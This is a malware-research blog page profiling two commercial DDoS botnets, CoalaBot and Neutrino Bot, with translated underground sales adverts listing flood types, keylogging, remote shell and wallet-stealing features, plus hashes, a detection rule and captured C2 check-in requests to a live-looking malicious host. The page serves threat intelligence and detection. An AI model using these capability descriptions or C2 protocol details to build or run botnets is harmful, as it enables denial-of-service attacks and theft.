Ddos Archives | Forensic Blogs

CoalaBot appears to be build on August Stealer code (Panel and Traffic are really alike)

I found it spread as a tasks in a Betabot and in an Andromeda spread via RIG fed by at least one HilltopAds malvertising.

2017-09-11: a witnessed infection chain to CoalaBot

A look inside :

CoalaBot: Login Screen
(August Stealer alike)

CoalaBot: Statistics

CoalaBot: Bots

CoalaBot: Tasks

CoalaBot: Tasks

CoalaBot: New Taks (list)

CoalaBot: https get task details

CoalaBot: http post task details

CoalaBot: SettingsHere is the translated associated advert published on 2017-08-23 by a user going with nick : Discomrade.
(Thanks to Andrew Komarov and others who provided help here).
------------------------------------------
Coala Http Ddos Bot
The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.
Attack types:• ICMP (PING) FLOOD• UDP FLOOD• TCP FLOOD• HTTP ARME• HTTP GET *• HTTP POST *• HTTP SLOWLORIS *• HTTP PULSE WAVE *
* - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.

Binary:• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7, on later versions ОС .NET 2.0 disabled by default)• ~100kb after obfuscation• Auto Backup (optional)• Low CPU load for efficient use• Encryption of incoming/outgoing traffic• No installation on machines from former CIS countries(RU/UA/BL/KZ/...)• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.• Ability to link a build to more than one gate.
Panel:• Detailed statistics on time online/architecture/etc. • List of bots, detailed information• Number count of requests per second (total/for each bot)• Creation of groups for attacks• Auto sorting of bots by groups • Creation of tasks, the ability to choose by group/country• Setting an optional time for bots success rate
Other:
• Providing macros for randomization of sent data • Support of .onion gate• Ability to install an additional layer (BOT => LAYER => MAIN GATE)

Requirements:
• PHP 5.6 or higher• MySQL• Мodule for MySQLi(mysqli_nd); php-mbstring, php-json, php-mcrypt extensions
Screenshots:
• Statistics- http://i.imgur.com/FUevsaS.jpg• Bots - http://i.imgur.com/nDwl9pY.jpg• Created tasks - http://i.imgur.com/RltiDhl.png• Task List - http://i.imgur.com/tqEEpX0.jpg• Settings - http://i.imgur.com/EbhExjE.jpg

Price:
• $300 - build and panel. Up to 3 gates for one build.• $20 - rebuildThe price can vary depending on updates.Escrow service is welcome.
Help with installation is no charge.------------------------------------------

Sample:

VT link
MD5 f3862c311c67cb027a06d4272b680a3b
SHA1 0ff1584eec4fc5c72439d94e8cee922703c44049
SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08f

Emerging Threats rules :
2024531 || ET TROJAN MSIL/CoalaBot CnC Activity

Read More:
August in November: New Information Stealer Hits the Scene - 2016-12-07 - Proofpoint

Advertised on underground by n3utrino since december 2013 Neutrino Bot is another "HTTP stress testing tool" , read DDos Bot.

Piece of the advert

Here is the text of one Advert :
------------------------------------------
Neutrino Bot

- Основной функционал
* HTTP(S) флуд ( методы GETPOST )
* AntiDDOS флуд ( Эмуляция jsкуки )
* Slowloris флуд
* Download флуд
* TCP флуд
* UDP флуд

* Лоадер ( exe, dll, vbs, bat ... + возможность указать параметры для запуска файла)
* Кейлоггер (Multilanguage) (поддержка виртуальных клавиатур (снятие скриншотов в области клика размером 60х60)) ( Возможность слежения за указанным окном )
* Command shell ( удалённое выполнение команд с помощью командного интерпретатора windows)
* Стилинг файлов по маске ( кошельков bitcoin к примеру )
* Запуск браузера с переходом по указанной ссылке ( aka накрутчик просмотров)
* Подмена Hosts
* Стиллинг Win ключей
* Размножение ( USBArchive )
* Определение чистоты загрузок ( количество найденных "соседей" на компьютере )
* Определение установленного АВ ( на всех ОС Windows кроме серверных )
* Обновление
* Работа через прокладки

- Дополнительные функции
* Антиотладка
* AntiVM
* Детект песочниц
* Детект всех онлайн сервисов автоматического анализа
* BotKiller

* Защита бота ( защита процессафайлаветок реестра )
* Неограниченное количество одновременно выполняемых команд ( Некоторые команды имеют более высокий приоритет по отношению к другим и их выполнение останавливает другие )
* Неограниченное количество резервных доменов
* Тихая работа даже под ограниченной учётной записью
* Не нагружает CPU

- Функционал админки
* Гибкая система создания заданий
* Подробная статистика по ботам
* Возможность отдавать команды каждому боту или стране отдельно
* Настраиваемое время отстука ботов
* Сортировка ботов в стате по IPОнлайнуСтранеOS
* Система банов.

- Вес несжатого бинарника ~ 50kb ( ЯП - C )
- Бот протестирован на всей линейке Windows, от XP до 8.1 (x32/64)

Ценники -
Полный комплект ( админка + бот + билд на неограниченное кол-во доменов ) - 200$
Ребилд ( также неогр. кол-во доменов ) - 10$
Обновление ( функциональное ) - 20$
Билдер - 550$
Оплата - WM BTC Perfect

Бинарник лицензирован, слив - остаётесь без поддержки.

-Контакты
ПМ или n3utrino@kaddafi.me / n3utrino@xmpp.jp

Справка по командамПодробное описание функционала - http://n3utrino.blog.com/

P.S. Бот никакого отношения к одноимённой связке не имеет.
------------------------------------------
Google Translated as :
------------------------------------------
Neutrino Bot

- The main functional
* HTTP (S) flood (methods GET POST)
* AntiDDOS flood (Emulation js cookies)
* Slowloris flood
* Download flood
* TCP flood
* UDP flood

* Loader (exe, dll, vbs, bat ... + can specify parameters for running the file)
* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window)
* Command shell (remote command execution using shell windows)
* Stealing files by mask (eg bitcoin wallets)
* Launch the browser with one of these links (aka Cheaters views)
* Spoofing Hosts
* Stilling Win keys
* Reproduction (USB Archive)
* Purity downloads (number found "neighbors" on the computer)
* Identifying the installed AV (on all Windows except Server)
* Update
* Work through the gasket

- Additional Features
* Anti debugging
* AntiVM
* Detect sandboxes
* Detect all online services automatic analysis
* BotKiller

* Bot protection (protection process file registry branches)
* Unlimited number of concurrent commands (Some teams have a higher priority than others, and their execution stops others)
* Unlimited number of backup domain
* Quiet operation even under a limited account
* Do not load the CPU

- Functional admin
* Flexible system for creating jobs
* Detailed statistics for bots
* Ability to give commands to each country separately or bot
* Customizable otstuk bots
* Sort bots in Articles IP Live Country OS
* System Bans.

- Weight uncompressed binary file ~ 50kb (PL - C)
- Boat tested on the entire line of Windows, from XP to 8.1 (x32/64)

tags -
Full set (+ bot + admin panel to build an unlimited number of domains) - $ 200
Rebuild (also unlim. Quantity domains) - $ 10
Update (functional) - $ 20
Builder - $ 550
Payment - WM BTC Perfect

Binary licensed, plums - are left without support.

-Contact
PM or n3utrino@kaddafi.me / n3utrino@xmpp.jp

Command Help Detailed functional - http://n3utrino.blog.com/

P.S. Boat no relation to the same name does not have a bunch.
------------------------------------------
As you can see it's advertised in the open :

N3utrino Blog - Information

N3utrino blog - Price

N3utrino blog - Screenshots
Screenshots provided by the coder on the blog and in forums :

Neutrino - Index

Neutrino - Clients

Neutrino - Clients 2

Neutrino - Stats

Neutrino - Stats 2Coder also provided the panel on underground.

piece of the Neutrino panel code.

I met one of those bot (v2.5 - dab012115fa267d95c1145a1eb41d38d ) as a second stage of an Andromeda pushed in Nuclear Pack (the one featured here)

Here is Neutrino calling back home (cf attached pcap) :

http://nav1111sto.mcdir.ru/modopo/tasks.phpPOST /modopo/tasks.php HTTP/1.0
Host: nav1111sto.mcdir.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Content-type: application/x-www-form-urlencoded
Cookie: session=21232f297a57a5a743894a0e4a801fc3
Content-length: 8

ping=1

http://nav1111sto.mcdir.ru/modopo/tasks.phpPOST /modopo/tasks.php HTTP/1.0
Host: nav1111sto.mcdir.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Content-type: application/x-www-form-urlencoded
Cookie: session=21232f297a57a5a743894a0e4a801fc3
Content-length: 137

getcmd=1&uid=D2BDB99374A80FB8&os=Windows+XP+PRO+(x32)&av=Not+installed&nat=yes&version=2.5&serial=DFW32-R7WFG-[redacted]-[redacted]-777GD&quality=0Files : Pcap - Panel (as v2.1) - Bot v2.5
Hashes : dab012115fa267d95c1145a1eb41d38d (2.5)
bb42fce5d9cb73561ec4e3c343c10d52 (2.1)
e6ea45deca7e9dd9afeb276ec1d4509c (2.0)
ce5c86fb4c44a7655ed6caaf42a688b3 2.6 - Pushed in Infinity - 2014-06-19

Read more :
Barclays Transaction Notification contains "Neutrino Downloader" - 2014-04-10 - Kimberly - StopMalvertising
Post Publication Reading :
A Glance Into the Neutrino Botnet - 2014-06-23 - Umesh Wanve - McAfee

CoalaBot : http Ddos Bot

Neutrino Bot (aka MS:Win32/Kasidet)